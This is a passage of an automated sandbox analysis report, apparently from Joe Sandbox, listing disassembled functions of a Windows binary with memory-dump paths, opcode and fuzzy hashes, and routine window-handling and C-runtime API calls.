                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0857a7da0f3c164ff0cc7f804bf162dd944b15c38e42436e4ecea15042e97313
                                                            • Instruction ID: 1d688bddadca97ff45dd673671e0743d86463fcce7a6825f353c415be53b46a9
                                                            • Opcode Fuzzy Hash: 0857a7da0f3c164ff0cc7f804bf162dd944b15c38e42436e4ecea15042e97313
                                                            • Instruction Fuzzy Hash: 5912E0B16587468FC718CF29C8C0A79B7E0FF94304F10896EE996C7780EB34A995DB45
                                                            Function 00BDC426 Relevance: .5, Instructions: 454COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb5f21a68121105469f69922cfe3e1af5ea884dd7c98a3921e0a05ac4bbaddf1
                                                            • Instruction ID: b0c3d23e44e8a71efcaca15f0562615a5538c113ef7f9809c4cab13f3f9b1bd4
                                                            • Opcode Fuzzy Hash: eb5f21a68121105469f69922cfe3e1af5ea884dd7c98a3921e0a05ac4bbaddf1
                                                            • Instruction Fuzzy Hash: 2BF19A71A083028FC719CF28C49462AFFE5EF8A314F645AAFF58597391E634E945CB42
                                                            Function 00BE6CDC Relevance: .3, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 47fa51547ed9c9339d22707bff8516c8f77da2bcdbab773e81c6d4d81e3c6e97
                                                            • Instruction ID: 5882779cee5e6908a13888e5fce7a4194433dccdd54abafb587fea8a2e58332a
                                                            • Opcode Fuzzy Hash: 47fa51547ed9c9339d22707bff8516c8f77da2bcdbab773e81c6d4d81e3c6e97
                                                            • Instruction Fuzzy Hash: 07D1E6716483858FCB14CF29C88475BBBE1FF99308F0445ADE8899B342D774E905CB96
                                                            Function 00BDE9B7 Relevance: .3, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54ebf982ae6940f38dd71800728d49c5634260b2d999704d25fb62dd0190f31b
                                                            • Instruction ID: 284136d3519fbf224de12a992a92067e565d82703f645a22a9a6cda06beb7075
                                                            • Opcode Fuzzy Hash: 54ebf982ae6940f38dd71800728d49c5634260b2d999704d25fb62dd0190f31b
                                                            • Instruction Fuzzy Hash: DDE147745083908FC304CF69D8809AEBBF0BF8A314F46499EF9D497352C235EA19DB92
                                                            Function 00BE4088 Relevance: .3, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction ID: 8b81e2caf098994b455b27f96a229ccb46c6b28f7d818d1a3df540359de95f2e
                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction Fuzzy Hash: EB9179B02003858BDB24EF65DCD4BBEB7D5EB90300F1009ADFA96C7282EB759945D356
                                                            Function 00BE43BF Relevance: .2, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: f2273f8f55521b0b0208dcb59cc7d4f009e406ddad230bdaa9e790de6e6bdee2
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: 558128717043C64FDB24DE6AD8D1BBD77D4EBA1304F0009AEE9868B3C2DF6489859752
                                                            Function 00BF51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 894f767075c2f8d027b2ada556858d648b924df9b1a148cda93d30f3af54ce61
                                                            • Instruction ID: 8058f328aeae740b5f871672e5cf24588da60d820b2d3fadc03734254db8cb5a
                                                            • Opcode Fuzzy Hash: 894f767075c2f8d027b2ada556858d648b924df9b1a148cda93d30f3af54ce61
                                                            • Instruction Fuzzy Hash: 64619B31A00F0C57DA389A6C68D5BBE63D4EB02340F1407DAE743DF682D691ED4E8359
                                                            Function 00BF4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction ID: e57d264ff41ecb9a15d67bf95f4a4aace33cfafdd2ea27d8b55a1b03930f9ea6
                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction Fuzzy Hash: 05513761200F4D57DF384938859ABBF67C9DB02300F1809D9EB8ADB283DA15EE4D83A5
                                                            Function 00BDEFE2 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81234bc02871d82203098e8eeb92e174deecdab25f1e0ba861f8489ade0f6e0a
                                                            • Instruction ID: 8af0c25cd60f4e3934747c17faa309fc247332942e40514bba8d0cc07b10437d
                                                            • Opcode Fuzzy Hash: 81234bc02871d82203098e8eeb92e174deecdab25f1e0ba861f8489ade0f6e0a
                                                            • Instruction Fuzzy Hash: 4A51B33150D3D68AC711CF24C54047EFFE0AE9A314F4949EAE4DA5B343D231DA4ADB52
                                                            Function 00BE00B7 Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85088c9e326902f4f74716c7875f9545bbef1bbb9a5326de234af0627b33f714
                                                            • Instruction ID: 6b708523f15f2f09c29b101d337d1aa885ab35476645ec1f01c6085b2a934247
                                                            • Opcode Fuzzy Hash: 85088c9e326902f4f74716c7875f9545bbef1bbb9a5326de234af0627b33f714
                                                            • Instruction Fuzzy Hash: 5C51DFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E3341D734EA99CB9A
                                                            Function 00BE3E0B Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: 774bec96438991e4cdf8983b7262865bf04784657ef0d097b5b471b8d01c6ba5
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: 6C3118B1A147468FCB18DF29C89116EFBE0FB95704F10456DE885C7341D735EA0ACB91
                                                            Function 00BDE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BDE30E
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                              • Part of subcall function 00BE1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00C11030,00000200,00BDD928,00000000,?,00000050,00C11030), ref: 00BE1DC4
                                                            • _strlen.LIBCMT ref: 00BDE32F
                                                            • SetDlgItemTextW.USER32(?,00C0E274,?), ref: 00BDE38F
                                                            • GetWindowRect.USER32(?,?), ref: 00BDE3C9
                                                            • GetClientRect.USER32(?,?), ref: 00BDE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00BDE475
                                                            • GetWindowRect.USER32(?,?), ref: 00BDE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 00BDE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 00BDE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 00BDE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 00BDE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 00BDE58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: dabb7cadd0b0f7b5889052a80e6d2b7768f378b8647341e31e624562007e2c9e
                                                            • Instruction ID: 5beea1ae317a3e42e709774fd6c305f8ca821c00b1afa8d80d48408ebdb530ff
                                                            • Opcode Fuzzy Hash: dabb7cadd0b0f7b5889052a80e6d2b7768f378b8647341e31e624562007e2c9e
                                                            • Instruction Fuzzy Hash: AA81B071208341AFD710DFA8CD89B6FFBE9EB88714F04092EFA9597250E735E9058B52
                                                            Function 00BFCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00BFCB66
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC71E
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC730
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC742
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC754
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC766
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC778
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC78A
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC79C
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7AE
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7C0
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7D2
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7E4
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7F6
                                                            • _free.LIBCMT ref: 00BFCB5B
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BFCB7D
                                                            • _free.LIBCMT ref: 00BFCB92
                                                            • _free.LIBCMT ref: 00BFCB9D
                                                            • _free.LIBCMT ref: 00BFCBBF
                                                            • _free.LIBCMT ref: 00BFCBD2
                                                            • _free.LIBCMT ref: 00BFCBE0
                                                            • _free.LIBCMT ref: 00BFCBEB
                                                            • _free.LIBCMT ref: 00BFCC23
                                                            • _free.LIBCMT ref: 00BFCC2A
                                                            • _free.LIBCMT ref: 00BFCC47
                                                            • _free.LIBCMT ref: 00BFCC5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 63efad5d4bb9c2dae470d71057c1993ac791ae8330a09f506e2fdf7887c25980
                                                            • Instruction ID: 5b418336b9b4a6d43527638313e70a1ae7ac25981e13e3694e18331836d6073b
                                                            • Opcode Fuzzy Hash: 63efad5d4bb9c2dae470d71057c1993ac791ae8330a09f506e2fdf7887c25980
                                                            • Instruction Fuzzy Hash: 33315E3560030D9FEB24AA38DA46B7ABBE9EF11350F1454ADE658D7192DF31EC88CB50
                                                            Function 00BE9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BE9736
                                                            • _wcslen.LIBCMT ref: 00BE97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00BE97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BE9806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BE982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: 547b697c21818df1abbe1fed7a0446b88539adafc2cea6688bd4246746509b7f
                                                            • Instruction ID: b1f9ddbff0e5a2d08847bde065ada8ee50cb3c4c04155eb3c75ace27fcdd2c43
                                                            • Opcode Fuzzy Hash: 547b697c21818df1abbe1fed7a0446b88539adafc2cea6688bd4246746509b7f
                                                            • Instruction Fuzzy Hash: DB3146321083957AE729AB369C46F6F77DCEF52710F10019EFA01971D2EB649A0CC3A6
                                                            Function 00BED69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 00BED6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 00BED6ED
                                                              • Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00BED709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BED720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00BED734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BED75D
                                                            • DeleteObject.GDI32(00000000), ref: 00BED764
                                                            • GetWindow.USER32(00000000,00000002), ref: 00BED76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: b986b13abfc350b0916bee4bdf53e0605a93afec5997791336ba53634278c675
                                                            • Instruction ID: 88f7d3009563fcda674e8b003ca1e5caa8be68578c441e57ebcbf79c7de94337
                                                            • Opcode Fuzzy Hash: b986b13abfc350b0916bee4bdf53e0605a93afec5997791336ba53634278c675
                                                            • Instruction Fuzzy Hash: 511126722043E07BE3216B729C8AFAF76DCEF54711F004161FA51A60D1DBA4CF0546B5
                                                            Function 00BF96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BF9705
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BF9711
                                                            • _free.LIBCMT ref: 00BF971C
                                                            • _free.LIBCMT ref: 00BF9727
                                                            • _free.LIBCMT ref: 00BF9732
                                                            • _free.LIBCMT ref: 00BF973D
